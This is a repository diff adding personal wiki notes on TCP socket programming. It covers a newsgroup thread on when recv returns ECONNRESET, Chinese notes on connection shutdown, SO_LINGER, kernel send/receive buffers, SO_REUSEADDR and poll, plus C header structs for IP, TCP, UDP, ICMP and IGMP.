> > The man page for recv and read list the error ECONNRESET as an error
|
||||
> > condition that happens when "A connection was forcibly closed by a
|
||||
> > peer." I take this to mean that, assuming a TCP connection, if a
|
||||
> > client is recv'ing from a server, and the server suddenly crashes,
|
||||
> > then on the client side recv will return -1 and set errno to
|
||||
> > ECONNRESET.
|
||||
>
|
||||
> Actually no When the server _system_ suddenly crashes, your
|
||||
> application receives nothing.
|
||||
|
||||
But if you were sending something at the time that it crashed, you
|
||||
system will keep retransmitting. When the system reboots, it will
|
||||
respond to the retransmission with a RST, and this will cause you to get
|
||||
ECONNRESET.
|
||||
|
||||
--
|
||||
Barry Margolin, barmar@alum.mit.edu
|
||||
Arlington, MA
|
||||
*** PLEASE post questions in newsgroups, not directly to me ***
|
||||
*** PLEASE don't copy me on replies, I'll read them in the group ***
|
||||
|
||||
Reply With Quote Reply With Quote
|
||||
10-04-2007 12:09 AM #6
|
||||
Re: How do you get ECONNRESET on recv?
|
||||
|
||||
Barry Margolin wrote:
|
||||
> But if you were sending something at the time that it crashed, you
|
||||
> system will keep retransmitting. When the system reboots, it will
|
||||
> respond to the retransmission with a RST, and this will cause you to
|
||||
> get ECONNRESET.
|
||||
|
||||
I thought one got some sort of timed-out or unreachable errno or
|
||||
somesuch?
|
||||
|
||||
rick jones
|
||||
--
|
||||
No need to believe in either side, or any side. There is no cause.
|
||||
There's only yourself. The belief is in your own precision. - Jobert
|
||||
these opinions are mine, all mine; HP might not want them anyway...
|
||||
feel free to post, OR email to rick.jones2 in hp.com but NOT BOTH...
|
||||
|
||||
Reply With Quote Reply With Quote
|
||||
10-04-2007 12:09 AM #7
|
||||
Re: How do you get ECONNRESET on recv?
|
||||
|
||||
In article ,
|
||||
Rick Jones wrote:
|
||||
|
||||
> Barry Margolin wrote:
|
||||
> > But if you were sending something at the time that it crashed, you
|
||||
> > system will keep retransmitting. When the system reboots, it will
|
||||
> > respond to the retransmission with a RST, and this will cause you to
|
||||
> > get ECONNRESET.
|
||||
>
|
||||
> I thought one got some sort of timed-out or unreachable errno or
|
||||
> somesuch?
|
||||
|
||||
Only if the reboot takes longer than the retransmission limit. In the
|
||||
days when a reboot took several minutes that would be likely, but these
|
||||
days many systems can reboot in under a minute (unless they have to do
|
||||
lengthy fsck's), so the ECONNRESET is a possibility.
|
||||
|
||||
--
|
||||
Barry Margolin, barmar@alum.mit.edu
|
||||
Arlington, MA
|
||||
*** PLEASE post questions in newsgroups, not directly to me ***
|
||||
*** PLEASE don't copy me on replies, I'll read them in the group ***
|
||||
|
||||
Reply With Quote Reply With Quote
|
||||
10-04-2007 12:09 AM #8
|
||||
Re: How do you get ECONNRESET on recv?
|
||||
|
||||
Barry Margolin wrote:
|
||||
> Only if the reboot takes longer than the retransmission limit. In
|
||||
> the days when a reboot took several minutes that would be likely,
|
||||
> but these days many systems can reboot in under a minute (unless
|
||||
> they have to do lengthy fsck's), so the ECONNRESET is a possibility.
|
||||
|
||||
But what of the RFC suggested (or is it mandated?) quiet time on stack
|
||||
start?-)
|
||||
|
||||
rick jones
|
||||
--
|
||||
a wide gulf separates "what if" from "if only"
|
||||
these opinions are mine, all mine; HP might not want them anyway...
|
||||
feel free to post, OR email to rick.jones2 in hp.com but NOT BOTH...
|
||||
|
||||
Reply With Quote Reply With Quote
|
||||
10-04-2007 12:09 AM #9
|
||||
Re: How do you get ECONNRESET on recv?
|
||||
|
||||
In article ,
|
||||
Rick Jones wrote:
|
||||
|
||||
> Barry Margolin wrote:
|
||||
> > Only if the reboot takes longer than the retransmission limit. In
|
||||
> > the days when a reboot took several minutes that would be likely,
|
||||
> > but these days many systems can reboot in under a minute (unless
|
||||
> > they have to do lengthy fsck's), so the ECONNRESET is a possibility.
|
||||
>
|
||||
> But what of the RFC suggested (or is it mandated?) quiet time on stack
|
||||
> start?-)
|
||||
|
||||
If I understand it correctly, this just prohibits the rebooted system
|
||||
from initiating connections during the quiet time. It doesn't affect
|
||||
responding to segments received. In fact, the point of the quiet time
|
||||
is to ensure that new connections don't inadvertently reuse the port and
|
||||
sequence numbers of connections from before the reboot, which would
|
||||
prevent responding to those packets with RST.
|
||||
|
||||
--
|
||||
Barry Margolin, barmar@alum.mit.edu
|
||||
Arlington, MA
|
||||
*** PLEASE post questions in newsgroups, not directly to me ***
|
||||
*** PLEASE don't copy me on replies, I'll read them in the group ***
|
||||
|
||||
Reply With Quote Reply With Quote
|
||||
10-04-2007 12:10 AM #10
|
||||
Re: How do you get ECONNRESET on recv?
|
||||
|
||||
|
||||
I have written a multi-threaded C client application running on HP UX
|
||||
11 Pa RISC that sends a SOAP request via send( ) to a webservice
|
||||
residing on a Windows PC. The send( ) is always successful, and I
|
||||
perform no other socket calls until I issue a recv( ) to get the
|
||||
webservice response. Very occasionally the application either gets no
|
||||
reponse or an ECONNRESET response. We suspect some sort of network
|
||||
issue between the client and server. I have built and deployed my
|
||||
client application for several other platforms including Solaris and
|
||||
Windows and have never experienced this issue.
|
||||
|
||||
I feel that my application should handle this situation more
|
||||
gracefully, and to this end my questions are:
|
||||
|
||||
Is it safe to assume anything regarding the state of the send( )
|
||||
request on the webservice server? More specifically, what would be the
|
||||
proper way for my client application to recover?
|
||||
|
||||
On Aug 9, 3:27 pm, Rick Jones wrote:
|
||||
> chsal...@gmail.com wrote:
|
||||
> > The man page for recv and read list the error ECONNRESET as an error
|
||||
> > condition that happens when "A connection was forcibly closed by a
|
||||
> > peer." I take this to mean that, assuming a TCP connection, if a
|
||||
> > client is recv'ing from a server, and the server suddenly crashes,
|
||||
> > then on the client side recv will return -1 and set errno to
|
||||
> > ECONNRESET.
|
||||
>
|
||||
> Actually no When the server _system_ suddenly crashes, your
|
||||
> application receives nothing.
|
||||
>
|
||||
> ECONNRESET means the connection has received a ReSeT (RST) segment
|
||||
> (ostesibly) from the remote TCP. There are a multitude of reasons
|
||||
> such a segment could be received, including, but not limited to:
|
||||
>
|
||||
> *) the remote abused SO_LINGER and did an abortive close of the
|
||||
> connection
|
||||
>
|
||||
> *) your application sent data which arrived after the remote called
|
||||
> shutdown(SHUT_RD) or close()
|
||||
>
|
||||
> *) the remote TCP hit a retransmission limit and aborted (yes, if the
|
||||
> data segments weren't getting through the chances of the RST making
|
||||
> it are slim, but still non-zero)
|
||||
>
|
||||
> *) there was some actual TCP protocol error between the two systems
|
||||
>
|
||||
> 99 times out of ten if the server _application_ terminates
|
||||
> (prematurely) the normal close() which happens on almost all platorms
|
||||
> will cause TCP to emit a FINished (FIN) segment. That would then be a
|
||||
> recv/read return of zero at your end. Of course if your application
|
||||
> ignored that and then tried to send something, that brings us to the
|
||||
> second bullet item above.
|
||||
>
|
||||
> > But the man page says that recv should only return 0 if "the peer
|
||||
> > has performed an orderly shutdown". But a SIGSEGV is certainly not
|
||||
> > my idea of an "orderly shutdown"!
|
||||
>
|
||||
> Ah, but as per above, 99 times out of ten, when the OS is cleaning-up
|
||||
> after the SIGSEGV'd application, it goes ahead and calls (the moral
|
||||
> equivalent to) close(), which unless perhaps the application has set
|
||||
> the abortive close SO_LINGER options will result in a FIN being sent.
|
||||
> The TCP code doesn't know the difference between a close() from the
|
||||
> app making a direct call, the system making a close() call on normal
|
||||
> program termination, or one from abnormal termination.
|
||||
>
|
||||
> I suppse you could try setting the SO_LINGER options on the server
|
||||
> code to cause an RST when close() is called and then see what killing
|
||||
> the process does. Just be sure that you only do that in a debug
|
||||
> version and/or have code to put SO_LINGER back the way it should be
|
||||
> when doing a "normal" close() in your server app. Hmm, that might be
|
||||
> one of the few valid (IMO) reasons to use that otherwise heinous
|
||||
> direct-to_RST SO_LINGER option... Perhaps one day I will try that
|
||||
> with netperf.
|
||||
>
|
||||
> rick jones
|
||||
> --
|
||||
> Process shall set you free from the need for rational thought.
|
||||
> these opinions are mine, all mine; HP might not want them anyway...
|
||||
> feel free to post, OR email to rick.jones2 in hp.com but NOT BOTH...
|
||||
|
||||
|
||||
Reply With Quote Reply With Quote
|
||||
10-04-2007 12:10 AM #11
|
||||
Re: How do you get ECONNRESET on recv?
|
||||
|
||||
Fish Maker wrote:
|
||||
> I have written a multi-threaded C client application running on HP
|
||||
> UX 11 Pa RISC that sends a SOAP request via send( ) to a webservice
|
||||
> residing on a Windows PC. The send( ) is always successful, and I
|
||||
> perform no other socket calls until I issue a recv( ) to get the
|
||||
> webservice response. Very occasionally the application either gets
|
||||
> no reponse or an ECONNRESET response. We suspect some sort of
|
||||
> network issue between the client and server. I have built and
|
||||
> deployed my client application for several other platforms including
|
||||
> Solaris and Windows and have never experienced this issue.
|
||||
|
||||
> I feel that my application should handle this situation more
|
||||
> gracefully, and to this end my questions are:
|
||||
|
||||
> Is it safe to assume anything regarding the state of the send( )
|
||||
> request on the webservice server? More specifically, what would be
|
||||
> the proper way for my client application to recover?
|
||||
|
||||
If you have received nothing but the ECONRESET on the recv() you can
|
||||
assume nothing about the state of the request on the server. You do
|
||||
not know if the server application received the data, nor if it acted
|
||||
upon the data if it did receive it. To know that you need to receive
|
||||
some sort of message from the server application.
|
||||
|
||||
I'm not fully up on all the terminology, but you may want to web
|
||||
search on "two phase commit."
|
||||
|
||||
rick jones
|
||||
--
|
||||
web2.0 n, the dot.com reunion tour...
|
||||
these opinions are mine, all mine; HP might not want them anyway...
|
||||
feel free to post, OR email to rick.jones2 in hp.com but NOT BOTH...
|
||||
81
Zim/Programme/APUE/socket/TCP连接关闭总结.txt
Normal file
@@ -0,0 +1,81 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2012-02-27T20:06:34+08:00
|
||||
|
||||
====== TCP连接关闭总结 ======
|
||||
Created Monday 27 February 2012
|
||||
|
||||
http://blog.csdn.net/shallwake/article/details/5250467
|
||||
|
||||
由于涉及面太广,只作简单整理,有兴趣的可参考《UNIX Networking Programming》volum 1, Section 5.7, 5.12, 5.14, 5.15, 6.6 以及7.5 SO_LINGER选项。
|
||||
|
||||
以一个简单的echo服务器为例,客户端从标准输入读入字符,发送给服务器,服务器收到后再原样返回,客户端收到后打印到标准输出。
|
||||
|
||||
那么,关于套接字的关闭有以下几种情形:
|
||||
|
||||
1,客户端主动关闭连接:
|
||||
|
||||
1.1,客户端调用close()
|
||||
1.2,客户端进程关闭
|
||||
1.3,客户端调用shutdown()
|
||||
1.4,客户端调用close()+SO_LINGER选项
|
||||
1.5,客户端崩溃(突然断电,网线拔出,非正常关机,导致内核没有发送FIN,没有重启)
|
||||
|
||||
|
||||
2,服务器关闭连接:
|
||||
|
||||
2.1,服务器调用close()
|
||||
2.2,服务器进程关闭
|
||||
2.3,服务器崩溃
|
||||
2.4,服务器崩溃+SO_KEEPALIVE选项
|
||||
|
||||
========================================分割线=========================================
|
||||
|
||||
1.1与1.2等价,就算客户端进程关闭,系统内核也会自动close(socket),且注意,当socket__引用为0时__才会真正调用close(),__close()总是立即返回的,然后由系统尝试发送完内核缓冲区内的所有数据,接着才发送FIN__。所以,__进程退出后其发送的数据有可能还没发到对方__。
|
||||
|
||||
说道这里,不得不谈谈TCP连接关闭的四次握手。可以看成是2组FIN, ACK。主动关闭的一方先发送FIN,收到ACK后,进入FIN_WAIT2状态,此时也叫做“__半关闭”状态__,特别须要注意的是,此时__主动关闭一方的套接字依然可以接收数据包,但是不能发送数据包__。
|
||||
注意:
|
||||
1. 这里的“发”是指本地TCP发送FIN并收到ACK后( __可能由close()或shutdown(SHUT_WR)引起)再执行的__send或write系统调用,**不包括已经在发端的内核TCP缓冲区中**未发送的数据 (发送这些数据的send在close前调用,而且成功返回)。
|
||||
2. 如果在close或shutdown后继续发数据,则send,write有__可能收到SIGPIPE,然后出错返回,errno为EPIPE__,
|
||||
|
||||
被动关闭的一方,此时收到FIN了,一般情况下都是__由read(socket)返回0,然后得知对方关闭(但是本地还可以继续发数据。)__,close(socket)后,另外一组FIN,ACK随之产生,此时主动方进入TIME_WAIT状态。即四次握手完成。
|
||||
|
||||
以上即是正常情况下连接关闭的情形。
|
||||
|
||||
再看看1.3,shutdown()与close()主要有3点区别:
|
||||
|
||||
* __shutdown()不理会引用计数与内核缓冲区内剩余待发数据包,直接发送FIN(对于关闭发送而言)__;
|
||||
* shutdown()可以只关闭套接字__某个方向__的连接,例如关闭发送,关闭接收,或者2者都关闭;
|
||||
|
||||
__实际上shutdown(write)后,就是上面说的半关闭情形,依然可以完成四次握手。__
|
||||
|
||||
===== 再看看1.4,为什么要设置SO_LINGER呢 =====
|
||||
|
||||
SO_LINGER的目的就是__改变close()的默认行为__,可以决定close()在哪个状态返回,或者让套接字__立即发送RST(而且没有TIME_WAIT状态)__,从而没有FIN的发送,接收方返回ECONNRESET错误,连接**直接关闭**。
|
||||
|
||||
再来总结下1.1-1.4,这么多关闭连接的方式,那么什么方式才是最好的呢?
|
||||
|
||||
择优选择的方式当然是考虑最恶劣的情况,对方主机崩溃或网络故障导致数据包传输停滞。
|
||||
|
||||
* RST不用考虑了,直接TIME_WAIT状态都没,如果有网络故障,可能**下次创建的套接字还会接收到已经被销毁的套接字的数据报**。
|
||||
* close()不能保证对方一定收到FIN(因为close总是**立即返回**的,有内核尝试发完TCP缓冲区中的所有数据,然后发送FIN。但这时__发送进程可能已经结束__了。)。
|
||||
* close()+SO_LINGER虽然能控制close()在__收到ACK后返回__,依然不能保证四次握手完成。
|
||||
* shutdown()先进入半关闭状态,再调用read(),返回0(收到对方FIN)则说明四次握手正常进行,__此为最优方式__。
|
||||
|
||||
其实仔细想想,一般情况也不用这么麻烦,拿网游服务器来说,客户端close()后,就算服务器不知道,那么这种情况归为1.5讨论;如果是服务端close()而客户端不知道,那么归为2.3讨论。总之都有解决办法。。
|
||||
|
||||
现在再讨论1.5,很简单,服务端加入链路异常检测机制即可,这也是所有大型TCP服务器必备的机制,__定时发送小数据包检测客户端是否有异常退出__。
|
||||
|
||||
========================================分割线=========================================
|
||||
|
||||
服务器关闭连接方面:
|
||||
|
||||
2.1,2.2等价,一般情况下也与1.1,1.2等价,只是主动关闭方是服务器了。
|
||||
2.3,服务器崩溃,客户端由于一直收不到ACK,会一直尝试发送数据,标准socket大概是__9分钟__后才会返回错误。
|
||||
2.3,服务器崩溃,客户端又长时间与服务器没有数据交互,此时设置__SO_KEEPALIVE__选项可得知。
|
||||
|
||||
========================================分割线=========================================
|
||||
|
||||
后记:网络是门复杂的学问,由此TCP连接的关闭可见一斑。普通程序员通常不会考虑这么细致,但是我相信这些问题一直困扰着他们。
|
||||
|
||||
补充说明:经试验,在Windows平台,__1.2 2.2情况等同于close()+SO_LINGER选项直接发送RST__,可能由于系统必须及时清理资源吧,这点**与linux是不同**的,有兴趣的可以试试。
|
||||
52
Zim/Programme/APUE/socket/理解套接字recv(),send().txt
Normal file
@@ -0,0 +1,52 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2012-02-27T20:43:52+08:00
|
||||
|
||||
====== 理解套接字recv(),send() ======
|
||||
Created Monday 27 February 2012
|
||||
|
||||
http://blog.csdn.net/shallwake/article/details/5273727
|
||||
|
||||
今天看UNP时,找到了个很不错的图示,觉得理解清楚后就基本没什么问题了,在这里做个简单整理,注意此图示是假设从stdin接受输入,然后send给套接字发送;从套接字recv后,传给stdout输出。
|
||||
|
||||
===== send:内核发送缓冲区(注意发送和接收缓冲区是环形的。) =====
|
||||
{{./1.jpg}}
|
||||
|
||||
* tooptr :指向下一个__将传送给socket__的字节
|
||||
* toiptr :指向下一个可以__接收应用层数据__的位置
|
||||
|
||||
所以:
|
||||
* 要传送给套接字的数据长度就是toiptr - tooptr。
|
||||
* 内核缓冲区可以接受stdin传来的数据长度是&to[MAXLINE] - toiptr。
|
||||
* 阻塞模式下:应用层copy数据至内核缓冲区即返回,若没有足够缓冲区容纳传来的__整个数据__(如网络太慢),则阻塞至有足够空间。
|
||||
* 非阻塞模式下:若缓冲区__已满__,立即返回EWOULDBLOCK,有缓冲区,立即返回的是__已经copy了的数据长度__。
|
||||
|
||||
=============================分割线===================================
|
||||
|
||||
===== recv:内核接收缓冲区 =====
|
||||
{{./2.jpg}}
|
||||
* froptr :指向下一个将__传送给应用层__的字节
|
||||
* friptr :指向下一个可以__接收socket数据__的位置
|
||||
|
||||
所以:
|
||||
* 要__传送给应用层__的数据长度就是friptr - froptr 。
|
||||
* 内核缓冲区可以接受__socket传来__的数据长度是&fr[MAXLINE] - friptr。
|
||||
* 阻塞模式下:若缓冲区内无数据可读,则__阻塞等待至有数据才返回,数据长度不定__,可以是1个字节,也可以是一个完整数据包
|
||||
* 非阻塞模式下:若缓冲区内无数据,立即返回EWOULDBLOCK,有缓冲区,与上面相同。
|
||||
|
||||
=============================分割线===================================
|
||||
|
||||
===== 总结: =====
|
||||
|
||||
* 无论阻塞还是非阻塞,不要指望send(n) or recv(n)就一定能发送或接收n字节的数据。
|
||||
* 把内核缓冲区理解清楚对网络编程理解很有帮助。
|
||||
|
||||
===== 思考: =====
|
||||
|
||||
众所周知一个服务器设计原则是“__不要使用任何阻塞操作__”。
|
||||
很容易理解,一是充分利用CPU;二则是安全性,比如恶意客户很容易让服务器阻塞在它上面。
|
||||
|
||||
关于__非阻塞的安全性__,我看过很多代码都是把非阻塞send()放进一个循环里,没有发送完指定n个数据则不退出,这在正常情况下可以,但是若网络比较慢,根据上面图示推测,显然while()退出也缓慢,这势必会影响服务器对其他套接字数据的发送。更不用考虑若对方是恶意用户,比如只接收一个字节则sleep()。。
|
||||
|
||||
所以,我觉得,高性能服务器不能用阻塞,也不能把任何I/O操作放进循环直到操作完期望数据,这点以后再整理。。。
|
||||
(可以用poll,epoll,select等。)
|
||||
BIN
Zim/Programme/APUE/socket/理解套接字recv(),send()/1.jpg
Normal file
|
After Width: | Height: | Size: 12 KiB |
BIN
Zim/Programme/APUE/socket/理解套接字recv(),send()/2.jpg
Normal file
|
After Width: | Height: | Size: 12 KiB |
54
Zim/Programme/APUE/socket2.txt
Normal file
@@ -0,0 +1,54 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-04-21T16:54:40+08:00
|
||||
|
||||
====== socket2 ======
|
||||
Created Thursday 21 April 2011
|
||||
http://blog168.chinaunix.net/space.php?uid=20196318&do=blog&id=171096
|
||||
1. 重用已使用的地址
|
||||
|
||||
问题描述:在刚刚关闭了测试程序后,再启动服务器时提示bind失败,返回错误EADDRINUSE。
|
||||
|
||||
原因分析:套接字(主动关闭一端)在关闭套接字后会停留在TIME_WAIT状态一端时间,由于我在同一机器上同时运行客户端与服务器,故服务器在重新启动执行bind时,可能上次关闭连接还没有完成,连接依然存在,故bind失败。通过设置套接口的SO_REUSEADDR可重用已绑定的地址,通常所有的TCP服务器都应该指定本套接口选项。具体方法为:
|
||||
|
||||
int flag = 1;
|
||||
|
||||
setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, &flag, sizeof(flag));
|
||||
|
||||
|
||||
|
||||
2.IO地址复用
|
||||
|
||||
直接调用read/write读写套接口和先调用select/poll在调用read/write都属于阻塞IO,只不过前者阻塞在读写系统调用上,而者阻塞在select/poll上。由于select需要两个系统调用,IO复用还稍有劣势,使用select/poll的优势在于我们可以等待多个描述字就绪。
|
||||
|
||||
|
||||
|
||||
IO复用的编程模型通常为:(以poll为例,应用实例请参考UNP第158页)
|
||||
|
||||
1. 创建一个pollfd结构数组,数组长度为进程可能打开的最大描述符个数,可简单的使用OPEN_MAX <limits.h>。
|
||||
|
||||
2. 置数组的第一个元素为监听套接字的就绪条件,并将其它的元素都清空。
|
||||
|
||||
3. 调用poll,等待poll返回。
|
||||
|
||||
4. 对于每一个已就绪的描述字:
|
||||
|
||||
l 如果是监听描述字,则调用accept,得到连接描述字,并在pollfd数组第一个空位中加入连接描述字的就绪条件,并将就绪描述字数目减1,当减到0时转到3。
|
||||
|
||||
l 如果是连接描述字,则接受来自该描述字的请求信息,并发送响应信息,将该描述字从pollfd数组中移除,并将就绪描述字数目减1,当减到0时转到3。
|
||||
|
||||
|
||||
|
||||
3. 同一地址启动TCP与UDP服务
|
||||
|
||||
1. 创建TCP套接字,并绑定地址。
|
||||
|
||||
2. 创建UDP套接字,并绑定地址。
|
||||
|
||||
3. 调用select/poll检查TCP、UDP套接字是否就绪。
|
||||
|
||||
l 如果TCP套接字可读,则调用accept获取连接套接字,读取并响应请求。
|
||||
|
||||
l 如果UDP套接字可读,则直接读取请求,并发送响应。
|
||||
|
||||
具体应用实例参见UNP第223页。
|
||||
186
Zim/Programme/APUE/socket_各种头数据结构及简要说明.txt
Normal file
@@ -0,0 +1,186 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-04T13:13:16+08:00
|
||||
|
||||
====== socket 各种头数据结构及简要说明 ======
|
||||
Created 星期六 04 六月 2011
|
||||
http://www.cppblog.com/franksunny/archive/2007/01/11/17537.html
|
||||
socket 各种头数据结构及简要说明
|
||||
|
||||
|
||||
|
||||
发布者: 许超 发表日期: 2006-06-12 18:44:51.153 原作者: supermgr
|
||||
|
||||
|
||||
|
||||
socket 各种头数据结构,及简要说明。
|
||||
|
||||
//DATATYPE
|
||||
|
||||
typedef signed char int8;
|
||||
|
||||
typedef signed short int16;
|
||||
|
||||
typedef signed long int32;
|
||||
|
||||
typedef signed long long int64;
|
||||
|
||||
typedef unsigned int uint;
|
||||
|
||||
typedef unsigned char uint8;
|
||||
|
||||
typedef unsigned short uint16;
|
||||
|
||||
typedef unsigned long uint32;
|
||||
|
||||
typedef unsigned long long uint64;
|
||||
|
||||
typedef float float32;
|
||||
|
||||
typedef double float64;
|
||||
|
||||
typedef wchar_t wchar;
|
||||
|
||||
//typedef void* ptr;
|
||||
|
||||
typedef int32 boolen;
|
||||
|
||||
|
||||
|
||||
//IP 头结构
|
||||
|
||||
typedef
|
||||
|
||||
struct _x_iphdr
|
||||
|
||||
{
|
||||
|
||||
uint8 ver; //4 位头结构长度 ,4 位 IP 版本号
|
||||
|
||||
uint8 tos; //8 位服务类型 TOS
|
||||
|
||||
uint16 len; //16 位总长度(字节)
|
||||
|
||||
uint16 ident; //16 位数据包标识
|
||||
|
||||
uint16 frag; //3 位标志位 /13 位偏移地址
|
||||
|
||||
uint8 ttl; //8 位生存时间 TTL (生命期)
|
||||
|
||||
uint8 proto; //8 位协议 (TCP, UDP 或其他 )
|
||||
|
||||
uint16 sum; //16 位 IP 头结构校验和
|
||||
|
||||
uint32 srcip; //32 位源 IP 地址
|
||||
|
||||
uint32 dstip; //32 位目的 IP 地址
|
||||
|
||||
}x_iphdr;
|
||||
|
||||
//TCP 伪头结构
|
||||
|
||||
typedef
|
||||
|
||||
struct _x_tcphdrpsd
|
||||
|
||||
{
|
||||
|
||||
uint32 saddr; // 源地址
|
||||
|
||||
uint32 daddr; // 目的地址
|
||||
|
||||
uint8 mbz; // 没用
|
||||
|
||||
uint8 proto; // 协议类型
|
||||
|
||||
uint16 tcpl; //TCP 长度
|
||||
|
||||
}x_tcphdrpsd;
|
||||
|
||||
//TCP 头结构
|
||||
|
||||
typedef
|
||||
|
||||
struct _x_tcphdr
|
||||
|
||||
{
|
||||
|
||||
uint16 sport; //16 位源端口
|
||||
|
||||
uint16 dport; //16 位目的端口
|
||||
|
||||
uint32 seq; //32 位序列号
|
||||
|
||||
uint32 ack; //32 位确认号
|
||||
|
||||
uint8 len; //4 位头结构长度 /6 位保留字
|
||||
|
||||
uint8 flag; //6 位标志位 (控制用)
|
||||
|
||||
uint16 win; //16 位窗口大小
|
||||
|
||||
uint16 sum; //16 位 TCP 校验和
|
||||
|
||||
uint16 urp; //16 位紧急数据偏移量
|
||||
|
||||
}x_tcphdr;
|
||||
|
||||
//UDP 头结构
|
||||
|
||||
typedef
|
||||
|
||||
struct _x_udphdr
|
||||
|
||||
{
|
||||
|
||||
uint16 sport; //16 位源端口
|
||||
|
||||
uint16 dport; //16 位目的端口
|
||||
|
||||
uint16 len; //16 位长度
|
||||
|
||||
uint16 sum; //16 位校验和
|
||||
|
||||
}x_udphdr;
|
||||
|
||||
//ICMP 头结构
|
||||
|
||||
typedef
|
||||
|
||||
struct _x_icmphdr
|
||||
|
||||
{
|
||||
|
||||
uint8 type; //8 位类型
|
||||
|
||||
uint8 code; //8 位代码
|
||||
|
||||
uint16 cksum; //16 位校验和
|
||||
|
||||
uint16 ident; // 识别号(一般用进程号作为识别号)
|
||||
|
||||
uint16 seq; // 报文序列号
|
||||
|
||||
uint32 tamp; // 时间戳
|
||||
|
||||
}x_icmphdr;
|
||||
|
||||
//IGMP 头结构
|
||||
|
||||
typedef
|
||||
|
||||
struct _x_igmphdr
|
||||
|
||||
{
|
||||
|
||||
uint8 code; //8 位代码
|
||||
|
||||
uint8 type; //8 位类型
|
||||
|
||||
uint16 res; // 没用
|
||||
|
||||
uint16 cksum; //16 位校验和
|
||||
|
||||
uint32 addr; //32 位组地址
|
||||
|
||||
}x_igmphdr;
|
||||
76
Zim/Programme/APUE/socket介绍.txt
Normal file
@@ -0,0 +1,76 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-04T13:23:53+08:00
|
||||
|
||||
====== socket介绍 ======
|
||||
Created 星期六 04 六月 2011
|
||||
http://blog.sina.com.cn/s/blog_6c8f8eba0100rgze.html
|
||||
(2011-04-12 09:53:22)
|
||||
|
||||
Processes that communicate using sockets use a **client server model**. A server provides a service and clients make use of that service. One example would be a Web Server, which provides web pages and a web client, or browser, which reads those pages. A server using sockets, first **creates a socket** and then **binds a name** to it. The format of this name is dependent on the **socket's address family** and it is, in effect, the **local address** of the server. The socket's name or address is specified using the** sockaddrdata structure**. An INET socket would have an IP port address bound to it. The registered port numbers can be seen in **/etc/services**; for example, the port number for a web server is 80. Having bound an address to the socket, the server then** listens for incoming connection requests** specifying the bound address. The originator of the request, the client, creates a socket and **makes a connection request **on it, specifying the target address of the server. For an INET socket the address of the server is its IP address and its port number. These incoming requests must find their way up through the various protocol layers and then wait on the **server's listening socket**. Once the server has received the incoming request it either accepts or rejects it. If the incoming request is to be accepted, the server must **create a new socket to accept it on**. Once a socket has been used for listening for incoming connection requests **it cannot be used to support a connection**. With the connection established both ends are free to send and receive data. Finally, when the connection is no longer needed it can be shutdown. Care is taken to ensure that data packets in transit are correctly dealt with.
|
||||
|
||||
The exact meaning of operations on a BSD socket depends on its underlying **address family**. Setting up **TCP/IP** connections is very different from setting up an amateur radio **X.25** connection. Like the **virtual filesystem**, Linux abstracts the socket interface with the BSD socket layer being concerned with the BSD socket interface to the application programs which is in turn supported by independent address family specific software.
|
||||
|
||||
At kernel initialization time, the** address families **built into the kernel register themselves with the BSD socket interface.
|
||||
Later on, as applications create and use BSD sockets, an association is made between the BSD socket and its supporting address family.
|
||||
This association is made via cross-linking data structures and tables of address family specific support routines.
|
||||
For example there is an address family specific socket creation routine which the BSD socket interface uses when an application creates a new socket.
|
||||
|
||||
TCP/IP协议结构:
|
||||
{{./TCP&IP协议结构.jpeg}}
|
||||
Linux网络层:
|
||||
{{./Linux网络层.gif}}
|
||||
python在进程通信和并行计算方面具有明显优势,这是由于python的出身血统,她起源于一个最早的分布式操作系统(Amoeba),而python socket是直接翻译BDS socket层。
|
||||
|
||||
工程技术的科学思想方法是把对象系统看成由
|
||||
|
||||
“层”(Layers)
|
||||
“子系统”(Subsystems)
|
||||
“子模块”(Submodules)
|
||||
等等组成的整体。
|
||||
linux file strucy:
|
||||
{{../linux-file-struct.gif}}
|
||||
各种格式的数据例如xml、json在机器之间和网络之间传输的前提是建立了一个socket并且按照传输协议例如,http、ftp、cgi等等。socket解决不同机器上的进程之间的通信。
|
||||
-
|
||||
python socket
|
||||
http://docs.python.org/release/3.1.3/library/socket.html#module-socket
|
||||
The Python interface is a straightforward transliteration of the Unix system call and library interface for sockets to Python’s object-oriented style: the socket() function returns a socket object whose methods implement the various socket system calls. Parameter types are somewhat higher-level than in the C interface: as with read() and write() operations on Python files, buffer allocation on receive operations is automatic, and buffer length is implicit on send operations.
|
||||
-
|
||||
python网络协议实现和支持
|
||||
各种格式的数据例如xml、json在机器之间和网络之间传输的前提是建立了一个socket并且按照传输协议例如,http、ftp、cgi等等。socket解决不同机器上的进程之间的通信。
|
||||
Internet Protocols and Support
|
||||
|
||||
20.1. webbrowser — Convenient Web-browser controller
|
||||
20.2. cgi — Common Gateway Interface support
|
||||
20.3. cgitb — Traceback manager for CGI scripts
|
||||
20.4. wsgiref — WSGI Utilities and Reference Implementation
|
||||
20.5. urllib.request — Extensible library for opening URLs
|
||||
20.6. urllib.response — Response classes used by urllib
|
||||
20.7. urllib.parse — Parse URLs into components
|
||||
20.8. urllib.error — Exception classes raised by urllib.request
|
||||
20.9. urllib.robotparser — Parser for robots.txt
|
||||
20.10. http.client — HTTP protocol client
|
||||
20.11. ftplib — FTP protocol client
|
||||
20.12. poplib — POP3 protocol client
|
||||
20.13. imaplib — IMAP4 protocol client
|
||||
20.14. nntplib — NNTP protocol client
|
||||
20.15. smtplib — SMTP protocol client
|
||||
20.16. smtpd — SMTP Server
|
||||
20.17. telnetlib — Telnet client
|
||||
20.18. uuid — UUID objects according to RFC 4122
|
||||
20.19. socketserver — A framework for network servers
|
||||
20.20. http.server — HTTP servers
|
||||
20.21. http.cookies — HTTP state management
|
||||
20.22. http.cookiejar — Cookie handling for HTTP clients
|
||||
20.23. xmlrpc.client — XML-RPC client access
|
||||
20.24. xmlrpc.server — Basic XML-RPC servers
|
||||
|
||||
python网络开发框架
|
||||
|
||||
Django
|
||||
webpy
|
||||
Tornado
|
||||
zope
|
||||
|
||||
python网络代理开发和应用
|
||||
|
||||
BIN
